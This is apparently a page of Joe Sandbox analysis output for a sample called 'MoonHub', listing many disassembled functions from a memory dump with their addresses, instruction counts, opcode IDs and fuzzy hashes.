                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f949d79cf7ede3e9dc4f014466588ef6704f96bee447bbc669e2bb12a7bb1ba9
                                                                                                                                                                                • Instruction ID: 5c115009014f8d25c98204e93eaf66790ef3fa11f99b30357484b45ca5163a6a
                                                                                                                                                                                • Opcode Fuzzy Hash: f949d79cf7ede3e9dc4f014466588ef6704f96bee447bbc669e2bb12a7bb1ba9
                                                                                                                                                                                • Instruction Fuzzy Hash: DE312AB2E0E6971FE316772DA8551F53BD0FF41268F0C01F6D598CA093EE15544B8A5C
                                                                                                                                                                                Function 00007FF848EA972D Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 646df7f06dcdd56e653279abfbd8d15ada38aad2ebd4c8109209d08e83a63c88
                                                                                                                                                                                • Instruction ID: 27b2e78431f0bad31cb47da20927a91f719c3d1e44c0b1754035ca8d8a9fa208
                                                                                                                                                                                • Opcode Fuzzy Hash: 646df7f06dcdd56e653279abfbd8d15ada38aad2ebd4c8109209d08e83a63c88
                                                                                                                                                                                • Instruction Fuzzy Hash: 02413A3061CA099FDBA4FA2CD444BA977E5FF98358F0406B9E849C7292DB35E8458B84
                                                                                                                                                                                Function 00007FF848EDA9E0 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7eae3ba1f0f337b3a2a8c8c22954d94d2180d51ec52cd044a953b0ceecb35fac
                                                                                                                                                                                • Instruction ID: 0ae47f4dea1b793c12965873c6e91384cc4c519381d73501ca489e69d6fccd7e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7eae3ba1f0f337b3a2a8c8c22954d94d2180d51ec52cd044a953b0ceecb35fac
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31D521B1C9070FEAA4AA1DA4847B563D1FFD87D1F04027AD44DC7296CF38ED868785
                                                                                                                                                                                Function 00007FF848E9E853 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d59ae8535bcb4edcfed43150b4805377c45fd71cc2b7845064916dbd3b8b9e4d
                                                                                                                                                                                • Instruction ID: 42f7dd929cc39b5a59bad0ffd3561118b7b4e4ffb457be58012ab1482a98056d
                                                                                                                                                                                • Opcode Fuzzy Hash: d59ae8535bcb4edcfed43150b4805377c45fd71cc2b7845064916dbd3b8b9e4d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D314D30A1C90A8FDB88EF48D491AAA73E2FF98354F545265E409C3285CBB4E842C784
                                                                                                                                                                                Function 00007FF848EAC2D0 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 36561cc9106b2dd5a2e44b75c24d1114a5785f472a215ca2648483980b31ec8c
                                                                                                                                                                                • Instruction ID: 69143b0b5b9395ba9d444bb48757c34861f282fc74bb161868fbbd5e391a88c2
                                                                                                                                                                                • Opcode Fuzzy Hash: 36561cc9106b2dd5a2e44b75c24d1114a5785f472a215ca2648483980b31ec8c
                                                                                                                                                                                • Instruction Fuzzy Hash: 5321E671A1CD4A1FDB4CAA1898469F937D1EB99350F04107EF44F832C7EE25B8468796
                                                                                                                                                                                Function 00007FF848E90640 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 95fe02f907cd03f250525d3cf47546f373c62c9f7aa5632cd5a143489910a070
                                                                                                                                                                                • Instruction ID: 17d57e850866ff791514777a51b84d0010ca219de21b9a6125e6e2cb7c3783e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 95fe02f907cd03f250525d3cf47546f373c62c9f7aa5632cd5a143489910a070
                                                                                                                                                                                • Instruction Fuzzy Hash: D4312721E0D98A5FEB48BB7C98156F9BBD1FF94354F0841BAD04DC31D3DE28A8098755
                                                                                                                                                                                Function 00007FF848E97569 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 37a854741c8f33cdf0efc306ddaa40b59f13fd8c131ade9a41783d4fefeb4d76
                                                                                                                                                                                • Instruction ID: 9b7cdf6cb9450a08fab6e8ab8c0b26330c2058eef845b797b6d9f266fd33c87a
                                                                                                                                                                                • Opcode Fuzzy Hash: 37a854741c8f33cdf0efc306ddaa40b59f13fd8c131ade9a41783d4fefeb4d76
                                                                                                                                                                                • Instruction Fuzzy Hash: 70314921E0D9865FE749BB7C48152A5BBE1FF95350F0801FBD04CC71D3DE28580A8752
                                                                                                                                                                                Function 00007FF848EAB518 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e6cd82cf4636f017b662dfc2cc72dedb281456f0a57e5217967e75aa4850bc91
                                                                                                                                                                                • Instruction ID: 8631ded236378c5c9ccca70da1ee200dfc9cdfac3e39ef4af67d64a6f10eb2b5
                                                                                                                                                                                • Opcode Fuzzy Hash: e6cd82cf4636f017b662dfc2cc72dedb281456f0a57e5217967e75aa4850bc91
                                                                                                                                                                                • Instruction Fuzzy Hash: B2310030A1DA499FD398FB2CC445571B7E1FFA9350B1002BED44EC7282DE35A882CB85
                                                                                                                                                                                Function 00007FF848EE9D38 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 494b924a50ec4924bdfbffdbb580bc2783ba02a076c4ca7c2b80e9b28e4bc16c
                                                                                                                                                                                • Instruction ID: 6defe044b3db2bcffeeddf81815655c34d11e1a3e35a377db41012c55b64d301
                                                                                                                                                                                • Opcode Fuzzy Hash: 494b924a50ec4924bdfbffdbb580bc2783ba02a076c4ca7c2b80e9b28e4bc16c
                                                                                                                                                                                • Instruction Fuzzy Hash: 48317A3061CE4A9FDBA4FA1DC085A62B7E1FBA8750F5041B9D54EC32A1DB35F8818785
                                                                                                                                                                                Function 00007FF848EA47D2 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 42ce322576215fcb96ac5b6efa8aefaa9df4d4861ac95d7efe0d5b7184d6ccd5
                                                                                                                                                                                • Instruction ID: 42831869e99017f042f93ee0c33358b3233020a165d12d13a6b66aa21dd95c0e
                                                                                                                                                                                • Opcode Fuzzy Hash: 42ce322576215fcb96ac5b6efa8aefaa9df4d4861ac95d7efe0d5b7184d6ccd5
                                                                                                                                                                                • Instruction Fuzzy Hash: 10314430A08A4E8FDB88EF1CD494BAA77E1FF68744F144569E419C7299CF34E846CB84
                                                                                                                                                                                Function 00007FF848EAAE14 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 408410766ad9fcf9fa8bb44a96b2d3005639d1dea8635b8977bcc16a8500f21f
                                                                                                                                                                                • Instruction ID: b983ce18c1e77a771262f04abbfddd2c8ccb748a4555009c0dd8b41f20c215de
                                                                                                                                                                                • Opcode Fuzzy Hash: 408410766ad9fcf9fa8bb44a96b2d3005639d1dea8635b8977bcc16a8500f21f
                                                                                                                                                                                • Instruction Fuzzy Hash: DF31F21194EBC20FE367577858612A63FE5EF576A0B0901EFD4CACB0D3DA1D588AC326
                                                                                                                                                                                Function 00007FF848E97580 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0061e6bb45a7b3108cfef08530e86450fe053216d8a3ec61538e0a6ff5c2983e
                                                                                                                                                                                • Instruction ID: 61270d1ecf2ddbdf132779e6524fee59fb1fe0c39ebda3dbcc013c1a299fb105
                                                                                                                                                                                • Opcode Fuzzy Hash: 0061e6bb45a7b3108cfef08530e86450fe053216d8a3ec61538e0a6ff5c2983e
                                                                                                                                                                                • Instruction Fuzzy Hash: 73312721E0CC4A5FEB88BB7C88196B5B7D1FF94394F0842BAD00DC71D7DE2898068751
                                                                                                                                                                                Function 00007FF848EA06AA Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 84978416712d3954d70cba82d27b66f61252dff7df198879cef75c93147673c7
                                                                                                                                                                                • Instruction ID: d40964a9bff703e52260f0b4e2d1b7ad22f4d23e8b56452e878fc0ab1b0688f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 84978416712d3954d70cba82d27b66f61252dff7df198879cef75c93147673c7
                                                                                                                                                                                • Instruction Fuzzy Hash: DB21F236D0DA5E8EF7A4B63498052F977E0FFA5791F040176E81CC3082EF39691A4A85
                                                                                                                                                                                Function 00007FF848EAAEF1 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8339e7a29958c9b034c2fdf8d614ddf21b262d56f8558204228464cb26ae95bd
                                                                                                                                                                                • Instruction ID: 7036d7d2c58c0365667cef20dbfd894ce259cd04449e5f86dcd2aef36b273b67
                                                                                                                                                                                • Opcode Fuzzy Hash: 8339e7a29958c9b034c2fdf8d614ddf21b262d56f8558204228464cb26ae95bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B31E26484E7C69FD396A77848211A9BFE1BF13650F4844FAD089CB0D3EA2C1844C766
                                                                                                                                                                                Function 00007FF848EA7759 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 300b8385cf1d857f0bb0260e6c829342a047f4d71dac01537ca66da8a80bdd44
                                                                                                                                                                                • Instruction ID: 8aec1c1f4287a925146f656a0e1480397b9acbbc9cb643be5abd6217863e6f2d
                                                                                                                                                                                • Opcode Fuzzy Hash: 300b8385cf1d857f0bb0260e6c829342a047f4d71dac01537ca66da8a80bdd44
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B317A70A19A0A8FEBC8EF28C8956B977E1FF58750F600179D45EC7291DF38A842C740
                                                                                                                                                                                Function 00007FF848EAB698 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a064419ed2be31778061218c4d092d629afe99a7b4b3e3512ff48ec2e3c0f7cf
                                                                                                                                                                                • Instruction ID: 823d0cf020e43d9dc21c74d2518482cec5895fdf413be30d31c785d2867ed9e3
                                                                                                                                                                                • Opcode Fuzzy Hash: a064419ed2be31778061218c4d092d629afe99a7b4b3e3512ff48ec2e3c0f7cf
                                                                                                                                                                                • Instruction Fuzzy Hash: D711D632B1C91A0FF768A51CBC0A6B573D0EB95671F14017BD94DC3297EE26BC4246C9
                                                                                                                                                                                Function 00007FF848ECFF80 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dc46112dd9efcca848da2a692ce1456b6dbf13a3413e86d9e2408024aa4a854c
                                                                                                                                                                                • Instruction ID: 8efc78b85f6ab820e803dc8905c7f30bd1a347780a633c68a12601aa42369b41
                                                                                                                                                                                • Opcode Fuzzy Hash: dc46112dd9efcca848da2a692ce1456b6dbf13a3413e86d9e2408024aa4a854c
                                                                                                                                                                                • Instruction Fuzzy Hash: FE210421F1CD4F1FE6A8F91C6445B7663C2FB993A0F5405BAD04EC3196DE78A8468348
                                                                                                                                                                                Function 00007FF848EA97FF Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 06e04bbb73852eb0833e384037718ea51ba4d877f87d3470105849644ae9bb70
                                                                                                                                                                                • Instruction ID: 31b69f0afd7219527859ac35e336110f97f35a95125df0470a8dc4905d12ae8a
                                                                                                                                                                                • Opcode Fuzzy Hash: 06e04bbb73852eb0833e384037718ea51ba4d877f87d3470105849644ae9bb70
                                                                                                                                                                                • Instruction Fuzzy Hash: 3631597290DB915FD306F73CA8A50F47FA0FF91355F0842BBD098CB0A3EA2455158399
                                                                                                                                                                                Function 00007FF848EAC2B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c5ff06ea51248d2a4badd6c60b63f24c4b015d04517acd24a2d8eac9aa259c04
                                                                                                                                                                                • Instruction ID: 5c2ff41c75cb7150700032c497504dc92db89aa642a44d08f42860ae57efeccf
                                                                                                                                                                                • Opcode Fuzzy Hash: c5ff06ea51248d2a4badd6c60b63f24c4b015d04517acd24a2d8eac9aa259c04
                                                                                                                                                                                • Instruction Fuzzy Hash: 7021F831A1CA461FE74CA61CA8465BA77D1FB99350F54107EF08FC3297DE39A806874A
                                                                                                                                                                                Function 00007FF848E9164A Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4a6dda2def9119cd025dd1d4d15150b8fec39271da370105ad673816bc1264de
                                                                                                                                                                                • Instruction ID: da869fbea3f4c1d88e427d2cd9e3a2f8ad67967900b1b7aa5df7baf3c524e6a8
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a6dda2def9119cd025dd1d4d15150b8fec39271da370105ad673816bc1264de
                                                                                                                                                                                • Instruction Fuzzy Hash: FB21F231F1CE5A4FE698B6BC541A67977D2EB89698F0401FAE40DC3293DE689C428385
                                                                                                                                                                                Function 00007FF848EAB740 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 91a9f6454634d6b1bd810a77c97e6c4cef24a9813e9439d711b3f0225049018c
                                                                                                                                                                                • Instruction ID: e43c8d647736003e651a5ecb17ff1486a2d6b3e24259e643b41fca3efb9858fe
                                                                                                                                                                                • Opcode Fuzzy Hash: 91a9f6454634d6b1bd810a77c97e6c4cef24a9813e9439d711b3f0225049018c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A21F331B1CA194FD7A8EB2C94587A67BC1FF98354F1401BAD00DCB292DA38E8408785
                                                                                                                                                                                Function 00007FF848E96D42 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4b30d47d2529d6fb1b70cf8994ca44d63d3272af0805dd315301f7a29cae2f11
                                                                                                                                                                                • Instruction ID: a1cb30c9e03bfa47648a851081be6efea46921d992b5c47e1d689a12d5e87164
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b30d47d2529d6fb1b70cf8994ca44d63d3272af0805dd315301f7a29cae2f11
                                                                                                                                                                                • Instruction Fuzzy Hash: 59313A3091D98A9FD788FBA8C455ABABBE1FF09344F4404B9D45AC72A3CF796841C744
                                                                                                                                                                                Function 00007FF848EA962F Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e74f04277780507e42d2164d2d03d7a31c4cee8da50313a37b13b2a718acc3c8
                                                                                                                                                                                • Instruction ID: 5fff7ff11293dc1378f90e2cb0f6828b43002168df921ed01f89028bf26247fa
                                                                                                                                                                                • Opcode Fuzzy Hash: e74f04277780507e42d2164d2d03d7a31c4cee8da50313a37b13b2a718acc3c8
                                                                                                                                                                                • Instruction Fuzzy Hash: C2216A30718D099FDA9CEA2CD889A7573E1FBA9350B4401A9E04EC36A6DF25EC468784
                                                                                                                                                                                Function 00007FF848EAB9D8 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 44a022439781c5b7906114fbf63ad627c3d492f7f76c0a03e39737bdc413a525
                                                                                                                                                                                • Instruction ID: c55a63a0f9bb96d2accedab31029b13fc65a5c111a6c0a9bfc76ca91357093b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 44a022439781c5b7906114fbf63ad627c3d492f7f76c0a03e39737bdc413a525
                                                                                                                                                                                • Instruction Fuzzy Hash: 42117221F1C90B4FE9E4B65D25856B913C2FFD87D0F5410B5D80DC72C6EF29AC4A8689
                                                                                                                                                                                Function 00007FF848EA95F0 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0a5a5749577fd8129d2d64dadc48a15aecaf25162a24f5890241fe33a67db207
                                                                                                                                                                                • Instruction ID: b4c6f4041ba91ce386d749600f3e3dc3f13e04d78db44138424beef11958cbd0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a5a5749577fd8129d2d64dadc48a15aecaf25162a24f5890241fe33a67db207
                                                                                                                                                                                • Instruction Fuzzy Hash: ED21296084EB9A6FD395F77848221EABAE1FF16650F4444FEE049CB0D3DE2C28418765
                                                                                                                                                                                Function 00007FF848EB6B70 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2b36e52e73cf7d6071e1ca73bbb8e544b2ffc2bf7be4f3faece21e026431b3c1
                                                                                                                                                                                • Instruction ID: e96553ce296783e4ca3afcf11298937894ed1deb3660cee81e2ff83be94635f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b36e52e73cf7d6071e1ca73bbb8e544b2ffc2bf7be4f3faece21e026431b3c1
                                                                                                                                                                                • Instruction Fuzzy Hash: 0521043090D9468FD725FB28C4848A277F1EFA1350F2886B9D04ECB1B6DA39EC86C744
                                                                                                                                                                                Function 00007FF848E907B8 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
